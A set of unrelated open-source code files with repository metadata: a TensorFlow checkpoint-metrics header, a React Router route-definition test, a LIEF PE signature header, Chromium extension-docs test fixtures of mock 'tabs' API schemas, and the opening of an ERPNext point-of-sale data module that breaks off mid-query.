monitoring::GaugeCell<std::string>& SavedModelFoundFingerprintOnLoad();
// Returns "/tensorflow/core/checkpoint/read/read_durations" cell belonging to
// field `api_label`.
monitoring::SamplerCell& CheckpointReadDuration(absl::string_view api_label);
// Returns "/tensorflow/core/checkpoint/write/write_durations" cell belonging to
// field `api_label`.
monitoring::SamplerCell& CheckpointWriteDuration(absl::string_view api_label);
// Returns "/tensorflow/core/checkpoint/write/async_write_durations" cell
// belonging to field `api_label`.
monitoring::SamplerCell& AsyncCheckpointWriteDuration(
    absl::string_view api_label);
// Returns "/tensorflow/core/checkpoint/write/training_time_saved" cell
// belonging to field `api_label`.
monitoring::CounterCell& TrainingTimeSaved(absl::string_view api_label);
// Returns "/tensorflow/core/checkpoint/write/checkpoint_size" cell
// belonging to field (`api_label`, `filesize`).
monitoring::CounterCell& CheckpointSize(absl::string_view api_label,
                                        int64_t filesize);
// Returns "/tensorflow/core/checkpoint/sharding/callback_duration" cell which
// describes how long it took to execute the checkpoint sharding callback in
// microseconds.
monitoring::CounterCell& ShardingCallbackDuration();
// Returns "/tensorflow/core/checkpoint/sharding/num_checkpoint_shards_written"
// cell which describes how many checkpoint shard files were written during
// saving.
monitoring::CounterCell& NumCheckpointShardsWritten();
// Returns "/tensorflow/core/checkpoint/sharding/callback_description" cell
// which describes the callback used to shard the checkpoint during saving.
monitoring::GaugeCell<std::string>& ShardingCallbackDescription();
}  // namespace metrics
}  // namespace tensorflow
|
c
|
github
|
https://github.com/tensorflow/tensorflow
|
tensorflow/cc/saved_model/metrics.h
|
import { defineRoutes } from "../defineRoutes";
describe("defineRoutes", () => {
  it("returns an array of routes", () => {
    // Nested `route(...)` calls inside a children callback attach the child
    // routes to the enclosing route (parentId in the snapshot below).
    let routes = defineRoutes((route) => {
      route("/", "routes/home.js");
      route("inbox", "routes/inbox.js", () => {
        route("/", "routes/inbox/index.js", { index: true });
        route(":messageId", "routes/inbox/$messageId.js");
        route("archive", "routes/inbox/archive.js");
      });
    });
    expect(routes).toMatchInlineSnapshot(`
      {
        "routes/home": {
          "caseSensitive": undefined,
          "file": "routes/home.js",
          "id": "routes/home",
          "index": undefined,
          "parentId": "root",
          "path": "/",
        },
        "routes/inbox": {
          "caseSensitive": undefined,
          "file": "routes/inbox.js",
          "id": "routes/inbox",
          "index": undefined,
          "parentId": "root",
          "path": "inbox",
        },
        "routes/inbox/$messageId": {
          "caseSensitive": undefined,
          "file": "routes/inbox/$messageId.js",
          "id": "routes/inbox/$messageId",
          "index": undefined,
          "parentId": "routes/inbox",
          "path": ":messageId",
        },
        "routes/inbox/archive": {
          "caseSensitive": undefined,
          "file": "routes/inbox/archive.js",
          "id": "routes/inbox/archive",
          "index": undefined,
          "parentId": "routes/inbox",
          "path": "archive",
        },
        "routes/inbox/index": {
          "caseSensitive": undefined,
          "file": "routes/inbox/index.js",
          "id": "routes/inbox/index",
          "index": true,
          "parentId": "routes/inbox",
          "path": "/",
        },
      }
    `);
  });

  it("works with async data", async () => {
    // Read everything *before* calling defineRoutes.
    let fakeDirectory = await Promise.resolve(["one.md", "two.md"]);
    let routes = defineRoutes((route) => {
      for (let file of fakeDirectory) {
        route(file.replace(/\.md$/, ""), file);
      }
    });
    expect(routes).toMatchInlineSnapshot(`
      {
        "one": {
          "caseSensitive": undefined,
          "file": "one.md",
          "id": "one",
          "index": undefined,
          "parentId": "root",
          "path": "one",
        },
        "two": {
          "caseSensitive": undefined,
          "file": "two.md",
          "id": "two",
          "index": undefined,
          "parentId": "root",
          "path": "two",
        },
      }
    `);
  });

  it("allows multiple routes with the same route module", () => {
    // Supplying an explicit `id` disambiguates routes that share a file.
    let routes = defineRoutes((route) => {
      route("/user/:id", "routes/_index.tsx", { id: "user-by-id" });
      route("/user", "routes/_index.tsx", { id: "user" });
      route("/other", "routes/other-route.tsx");
    });
    expect(routes).toMatchInlineSnapshot(`
      {
        "routes/other-route": {
          "caseSensitive": undefined,
          "file": "routes/other-route.tsx",
          "id": "routes/other-route",
          "index": undefined,
          "parentId": "root",
          "path": "/other",
        },
        "user": {
          "caseSensitive": undefined,
          "file": "routes/_index.tsx",
          "id": "user",
          "index": undefined,
          "parentId": "root",
          "path": "/user",
        },
        "user-by-id": {
          "caseSensitive": undefined,
          "file": "routes/_index.tsx",
          "id": "user-by-id",
          "index": undefined,
          "parentId": "root",
          "path": "/user/:id",
        },
      }
    `);
  });

  it("throws an error on route id collisions", () => {
    // Two conflicting custom id's
    let defineNonUniqueRoutes = () => {
      defineRoutes((route) => {
        route("/user/:id", "routes/user.tsx", { id: "user" });
        route("/user", "routes/user.tsx", { id: "user" });
        route("/other", "routes/other-route.tsx");
      });
    };
    expect(defineNonUniqueRoutes).toThrowErrorMatchingInlineSnapshot(
      `"Unable to define routes with duplicate route id: "user""`,
    );
    // Custom id conflicting with a later-defined auto-generated id
    defineNonUniqueRoutes = () => {
      defineRoutes((route) => {
        route("/user/:id", "routes/user.tsx", { id: "routes/user" });
        route("/user", "routes/user.tsx");
      });
    };
    expect(defineNonUniqueRoutes).toThrowErrorMatchingInlineSnapshot(
      `"Unable to define routes with duplicate route id: "routes/user""`,
    );
    // Custom id conflicting with an earlier-defined auto-generated id
    defineNonUniqueRoutes = () => {
      defineRoutes((route) => {
        route("/user", "routes/user.tsx");
        route("/user/:id", "routes/user.tsx", { id: "routes/user" });
      });
    };
    expect(defineNonUniqueRoutes).toThrowErrorMatchingInlineSnapshot(
      `"Unable to define routes with duplicate route id: "routes/user""`,
    );
  });
});
|
typescript
|
github
|
https://github.com/remix-run/react-router
|
packages/react-router-remix-routes-option-adapter/__tests__/defineRoutes-test.ts
|
/* Copyright 2017 - 2025 R. Thomas
* Copyright 2017 - 2025 Quarkslab
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#ifndef LIEF_PE_SIGNATURE_TYPES_H
#define LIEF_PE_SIGNATURE_TYPES_H
#include <string>
namespace LIEF {
namespace PE {
// ASN.1 Object Identifier used throughout the PE Authenticode signature code.
// Presumably stored in dotted-decimal text form (e.g. "1.2.840.113549.1.7.2")
// — confirm against the OID parsing code that produces these values.
using oid_t = std::string;
}
}
#endif
|
unknown
|
github
|
https://github.com/nodejs/node
|
deps/LIEF/include/LIEF/PE/signature/types.hpp
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
from extensions_paths import CHROME_EXTENSIONS
from test_file_system import MoveAllTo
from test_util import ReadFile
# Fixture IDL text for a fake "tabs" API. Here WasImplicitlyInlinedType is
# referenced by TWO functions (myFunc and anotherFunc).
FAKE_TABS_IDL = '\n'.join([
  '// Copyleft stuff.',
  '',
  '// Some description here.',
  'namespace fakeTabs {',
  ' dictionary WasImplicitlyInlinedType {};',
  ' interface Functions {',
  ' static void myFunc(WasImplicitlyInlinedType arg);',
  ' static void anotherFunc(WasImplicitlyInlinedType arg);',
  ' };',
  '};'])
# Variant of the fixture where WasImplicitlyInlinedType is referenced by only
# ONE function (anotherFunc removed) — the single use allows inlining.
FAKE_TABS_WITH_INLINING_IDL = '\n'.join([
  '// Copyleft stuff.',
  '',
  '// Some description here.',
  'namespace fakeTabs {',
  ' dictionary WasImplicitlyInlinedType {};',
  ' interface Functions {',
  ' static void myFunc(WasImplicitlyInlinedType arg);',
  ' };',
  '};'])
TABS_SCHEMA_BRANCHES = MoveAllTo(CHROME_EXTENSIONS, {
'master': {
'docs': {
'templates': {
'json': {
'api_availabilities.json': json.dumps({
'tabs.fakeTabsProperty4': {
'channel': 'stable',
'version': 27
}
}),
'intro_tables.json': '{}'
}
}
},
'api': {
'_api_features.json': json.dumps({
'tabs.scheduledFunc': {
'channel': 'stable'
}
}),
'_manifest_features.json': '{}',
'_permission_features.json': '{}',
'fake_tabs.idl': FAKE_TABS_IDL,
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'type': 'any',
'properties': {
'url': {
'type': 'any'
},
'index': {
'type': 'any'
},
'selected': {
'type': 'any'
},
'id': {
'type': 'any'
},
'windowId': {
'type': 'any'
}
}
},
{
'id': 'InlinedType',
'type': 'any',
'inline_doc': True
},
{
'id': 'InjectDetails',
'type': 'any',
'properties': {
'allFrames': {
'type': 'any'
},
'code': {
'type': 'any'
},
'file': {
'type':'any'
}
}
},
{
'id': 'DeprecatedType',
'type': 'any',
'deprecated': 'This is deprecated'
}
],
'properties': {
'fakeTabsProperty1': {
'type': 'any'
},
'fakeTabsProperty2': {
'type': 'any'
},
'fakeTabsProperty3': {
'type': 'any'
},
'fakeTabsProperty4': {
'type': 'any'
}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'type': 'function',
'parameters': [
{
'name': 'tab',
'type': 'any'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'type': 'function',
'parameters': [
{
'name': 'tab',
'type': 'any'
}
]
},
{
'name': 'tabId',
'type': 'any'
}
]
},
{
'name': 'restrictedFunc'
},
{
'name': 'scheduledFunc',
'parameters': []
}
],
'events': [
{
'name': 'onActivated',
'type': 'event',
'parameters': [
{
'name': 'activeInfo',
'type': 'any',
'properties': {
'tabId': {
'type': 'any'
},
'windowId': {
'type': 'any'
}
}
}
]
},
{
'name': 'onUpdated',
'type': 'event',
'parameters': [
{
'name': 'tabId',
'type': 'any'
},
{
'name': 'tab',
'type': 'any'
},
{
'name': 'changeInfo',
'type': 'any',
'properties': {
'pinned': {
'type': 'any'
},
'status': {
'type': 'any'
}
}
}
]
}
]
}])
}
},
'1612': {
'api': {
'_api_features.json': json.dumps({
'tabs.scheduledFunc': {
'channel': 'stable'
}
}),
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'fake_tabs.idl': FAKE_TABS_IDL,
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
},
{
'id': 'InjectDetails',
'properties': {
'allFrames': {},
'code': {},
'file': {}
}
},
{
'id': 'DeprecatedType',
'deprecated': 'This is deprecated'
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
},
{
'name': 'tabId'
}
]
},
{
'name': 'restrictedFunc'
},
{
'name': 'scheduledFunc',
'parameters': []
}
],
'events': [
{
'name': 'onActivated',
'parameters': [
{
'name': 'activeInfo',
'properties': {
'tabId': {},
'windowId': {}
}
}
]
},
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'tab'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1599': {
'api': {
'_api_features.json': "{}",
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'fake_tabs.idl': FAKE_TABS_IDL,
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
},
{
'id': 'InjectDetails',
'properties': {
'allFrames': {},
'code': {},
'file': {}
}
},
{
'id': 'DeprecatedType',
'deprecated': 'This is deprecated'
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
},
{
'name': 'tabId'
}
]
},
{
'name': 'restrictedFunc'
}
],
'events': [
{
'name': 'onActivated',
'parameters': [
{
'name': 'activeInfo',
'properties': {
'tabId': {},
}
}
]
},
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1547': {
'api': {
'_api_features.json': json.dumps({
'tabs.restrictedFunc': {
'channel': 'dev'
}
}),
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'fake_tabs.idl': FAKE_TABS_IDL,
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
},
{
'id': 'InjectDetails',
'properties': {
'allFrames': {},
'code': {},
'file': {}
}
},
{
'id': 'DeprecatedType',
'deprecated': 'This is deprecated'
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
},
]
},
{
'name': 'restrictedFunc'
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1500': {
'api': {
'_api_features.json': "{}",
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'fake_tabs.idl': FAKE_TABS_IDL,
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
},
{
'id': 'InjectDetails',
'properties': {
'allFrames': {},
}
},
{
'id': 'DeprecatedType',
'deprecated': 'This is deprecated'
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
},
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1453': {
'api': {
'_api_features.json': "{}",
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'fake_tabs.idl': FAKE_TABS_IDL,
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
},
{
'id': 'InjectDetails',
'properties': {
'allFrames': {},
}
},
{
'id': 'DeprecatedType',
'deprecated': 'This is deprecated'
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
},
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1410': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'fake_tabs.idl': FAKE_TABS_IDL,
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
},
{
'id': 'InjectDetails',
'properties': {
'allFrames': {},
}
},
{
'id': 'DeprecatedType',
'deprecated': 'This is deprecated'
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1364': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'fake_tabs.idl': FAKE_TABS_WITH_INLINING_IDL,
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
},
{
'id': 'InjectDetails',
'properties': {
'allFrames': {}
}
},
{
'id': 'DeprecatedType',
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1312': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1271': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1229': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1180': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1132': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1084': {
'api': {
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1025': {
'api': {
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'963': {
'api': {
'extension_api.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'912': {
'api': {
'extension_api.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
}
]
}
]
}])
}
},
'874': {
'api': {
'extension_api.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
}
]
}
]
}])
}
},
'835': {
'api': {
'extension_api.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {}
},
'functions': [
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
}
]
}
]
}])
}
},
'782': {
'api': {
'extension_api.json': "{}"
}
}
})
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe, json
from frappe import _
from frappe.utils import nowdate
from erpnext.setup.utils import get_exchange_rate
from erpnext.stock.get_item_details import get_pos_profile
from erpnext.accounts.party import get_party_account_currency
from erpnext.controllers.accounts_controller import get_taxes_and_charges
@frappe.whitelist()
def get_pos_data():
    """Build a fresh POS Sales Invoice shell plus every piece of master data
    the offline POS client needs (items, customers, serial/batch/tax/price/
    bin data, pricing rules, print template and doctype metadata) in one
    round trip."""
    doc = frappe.new_doc('Sales Invoice')
    doc.is_pos = 1;
    pos_profile = get_pos_profile(doc.company) or {}
    if not doc.company: doc.company = pos_profile.get('company')
    doc.update_stock = pos_profile.get('update_stock')
    if pos_profile.get('name'):
        # Re-fetch as a full document so child tables (payments, item_groups,
        # customer_groups) used by the helpers below are loaded.
        pos_profile = frappe.get_doc('POS Profile', pos_profile.get('name'))
    company_data = get_company_data(doc.company)
    update_pos_profile_data(doc, pos_profile, company_data)
    update_multi_mode_option(doc, pos_profile)
    default_print_format = pos_profile.get('print_format') or "Point of Sale"
    print_template = frappe.db.get_value('Print Format', default_print_format, 'html')
    return {
        'doc': doc,
        'default_customer': pos_profile.get('customer'),
        'items': get_items_list(pos_profile),
        'customers': get_customers_list(pos_profile),
        'serial_no_data': get_serial_no_data(pos_profile, doc.company),
        'batch_no_data': get_batch_no_data(),
        'tax_data': get_item_tax_data(),
        'price_list_data': get_price_list_data(doc.selling_price_list),
        'bin_data': get_bin_data(pos_profile),
        'pricing_rules': get_pricing_rule_data(doc),
        'print_template': print_template,
        'pos_profile': pos_profile,
        'meta': {
            'invoice': frappe.get_meta('Sales Invoice'),
            'items': frappe.get_meta('Sales Invoice Item'),
            'taxes': frappe.get_meta('Sales Taxes and Charges')
        }
    }
def get_company_data(company):
    """Return the full Company record for *company* (all fields)."""
    matches = frappe.get_all('Company', fields=["*"], filters={'name': company})
    return matches[0]
def update_pos_profile_data(doc, pos_profile, company_data):
    """Apply POS Profile settings to *doc* in place, falling back to company
    defaults: accounts, tax template, currency/conversion rate, price list,
    naming series, letter head, discount settings and customer group/territory."""
    doc.campaign = pos_profile.get('campaign')
    doc.write_off_account = pos_profile.get('write_off_account') or \
        company_data.write_off_account
    doc.change_amount_account = pos_profile.get('change_amount_account') or \
        company_data.default_cash_account
    doc.taxes_and_charges = pos_profile.get('taxes_and_charges')
    if doc.taxes_and_charges:
        update_tax_table(doc)
    doc.currency = pos_profile.get('currency') or company_data.default_currency
    doc.conversion_rate = 1.0
    if doc.currency != company_data.default_currency:
        # Non-base currency: fetch the exchange rate to company currency.
        doc.conversion_rate = get_exchange_rate(doc.currency, company_data.default_currency)
    doc.selling_price_list = pos_profile.get('selling_price_list') or \
        frappe.db.get_value('Selling Settings', None, 'selling_price_list')
    doc.naming_series = pos_profile.get('naming_series') or 'SINV-'
    doc.letter_head = pos_profile.get('letter_head') or company_data.default_letter_head
    doc.ignore_pricing_rule = pos_profile.get('ignore_pricing_rule') or 0
    # apply_discount_on is only meaningful when discounts are enabled on the profile.
    doc.apply_discount_on = pos_profile.get('apply_discount_on') if pos_profile.get('apply_discount') else ''
    doc.customer_group = pos_profile.get('customer_group') or get_root('Customer Group')
    doc.territory = pos_profile.get('territory') or get_root('Territory')
def get_root(table):
    """Return the name of the root node of the nested-set tree doctype *table*.

    NOTE(review): *table* is interpolated into the SQL as an identifier.
    Callers only pass fixed strings ('Customer Group', 'Territory'), so this
    is safe as used, but it must never be fed user-supplied input.
    """
    root = frappe.db.sql(""" select name from `tab%(table)s` having
        min(lft)"""%{'table': table}, as_dict=1)
    return root[0].name
def update_multi_mode_option(doc, pos_profile):
    """Populate the invoice's 'payments' child table.

    Uses the payment modes configured on the POS Profile when present;
    otherwise falls back to every Mode of Payment account of the company.
    """
    from frappe.model import default_fields
    if not pos_profile or not pos_profile.get('payments'):
        for payment in get_mode_of_payment(doc):
            payments = doc.append('payments', {})
            payments.mode_of_payment = payment.parent
            payments.account = payment.default_account
            payments.type = payment.type
        return
    for payment_mode in pos_profile.payments:
        payment_mode = payment_mode.as_dict()
        # Strip framework bookkeeping fields (name, owner, creation, ...) so
        # the copied row is appended as a brand-new child row of the invoice.
        for fieldname in default_fields:
            if fieldname in payment_mode:
                del payment_mode[fieldname]
        doc.append('payments', payment_mode)
def get_mode_of_payment(doc):
    """Return (default_account, parent mode name, type) rows for every Mode of
    Payment account configured for the invoice's company."""
    return frappe.db.sql(""" select mpa.default_account, mpa.parent, mp.type as type from `tabMode of Payment Account` mpa,
        `tabMode of Payment` mp where mpa.parent = mp.name and mpa.company = %(company)s""", {'company': doc.company}, as_dict=1)
def update_tax_table(doc):
    """Copy every row of the invoice's Sales Taxes and Charges Template
    into its 'taxes' child table."""
    template_rows = get_taxes_and_charges('Sales Taxes and Charges Template', doc.taxes_and_charges)
    for tax_row in template_rows:
        doc.append('taxes', tax_row)
def get_items_list(pos_profile):
    """Return saleable items for the POS client.

    Excludes disabled items and variant templates (has_variants = 1); when the
    POS Profile defines item groups, only items in those groups are returned.
    """
    cond = "1=1"
    item_groups = []
    if pos_profile.get('item_groups'):
        # Get items based on the item groups defined in the POS profile;
        # build one %s placeholder per group so values stay parameterized.
        cond = "item_group in (%s)"%(', '.join(['%s']*len(pos_profile.get('item_groups'))))
        item_groups = [d.item_group for d in pos_profile.get('item_groups')]
    return frappe.db.sql("""
        select
